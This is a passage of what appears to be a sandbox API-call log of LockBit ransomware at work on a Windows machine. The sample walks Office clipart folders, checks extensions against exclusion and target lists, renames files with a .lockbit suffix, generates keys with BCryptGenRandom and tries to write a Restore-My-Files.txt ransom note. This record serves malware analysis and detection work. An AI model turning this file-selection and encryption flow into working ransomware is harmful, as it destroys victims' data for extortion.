lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.885] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.885] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.885] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.885] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.885] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.885] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.lockbit") returned 72 [0121.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.886] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.886] malloc (_Size=0x40068) returned 0x3df0008 [0121.886] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20179) returned 1 [0121.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.887] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.902] malloc (_Size=0xa6) returned 0x77d7a8 [0121.903] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.985] free (_Block=0x77d7a8) [0121.985] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.985] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.985] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x27d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099169.WMF", cAlternateFileName="")) returned 1 [0121.985] lstrcmpiW (lpString1=".", lpString2="J0099169.WMF") returned -1 [0121.985] lstrcmpiW (lpString1="..", lpString2="J0099169.WMF") returned -1 [0121.985] PathFindExtensionW (pszPath="J0099169.WMF") returned=".WMF" [0121.985] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.985] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.985] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.986] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.994] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.994] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099169.WMF") returned 1 [0121.995] lstrcmpiW (lpString1="ntldr", lpString2="J0099169.WMF") returned 1 [0121.995] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099169.WMF") returned 1 [0121.995] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099169.WMF") returned -1 [0121.995] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099169.WMF") returned -1 [0121.995] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099169.WMF") returned 1 [0121.995] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099169.WMF") returned -1 [0121.995] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.995] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF") returned=".WMF" [0121.995] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.995] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.995] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.996] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.996] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.lockbit") returned 72 [0121.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.997] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.997] malloc (_Size=0x40068) returned 0x3df0008 [0121.997] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10192) returned 1 [0121.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.999] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0122.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.004] malloc (_Size=0xa6) returned 0x77d7a8 [0122.004] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0122.004] free (_Block=0x77d7a8) [0122.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.004] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.004] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x5ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099170.WMF", cAlternateFileName="")) returned 1 [0122.004] lstrcmpiW (lpString1=".", lpString2="J0099170.WMF") returned -1 [0122.004] lstrcmpiW (lpString1="..", lpString2="J0099170.WMF") returned -1 [0122.004] PathFindExtensionW (pszPath="J0099170.WMF") returned=".WMF" [0122.004] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.004] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.005] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.005] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099170.WMF") returned 1 [0122.006] lstrcmpiW (lpString1="ntldr", lpString2="J0099170.WMF") returned 1 [0122.006] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099170.WMF") returned 1 [0122.006] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099170.WMF") returned -1 [0122.006] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099170.WMF") returned -1 [0122.006] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099170.WMF") returned 1 [0122.006] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099170.WMF") returned -1 [0122.006] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.006] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF") returned=".WMF" [0122.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.006] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.007] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.007] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.lockbit") returned 72 [0122.007] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.008] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.008] malloc (_Size=0x40068) returned 0x3df0008 [0122.009] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24292) returned 1 [0122.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.010] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.369] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.369] malloc (_Size=0xa6) returned 0x77d7a8 [0122.369] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.455] free (_Block=0x77d7a8) [0122.455] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.455] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.456] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x2232, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099171.WMF", cAlternateFileName="")) returned 1 [0122.456] lstrcmpiW (lpString1=".", lpString2="J0099171.WMF") returned -1 [0122.456] lstrcmpiW (lpString1="..", lpString2="J0099171.WMF") returned -1 [0122.456] PathFindExtensionW (pszPath="J0099171.WMF") returned=".WMF" [0122.456] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.456] lstrcmpiW (lpString1=".diagpkg", 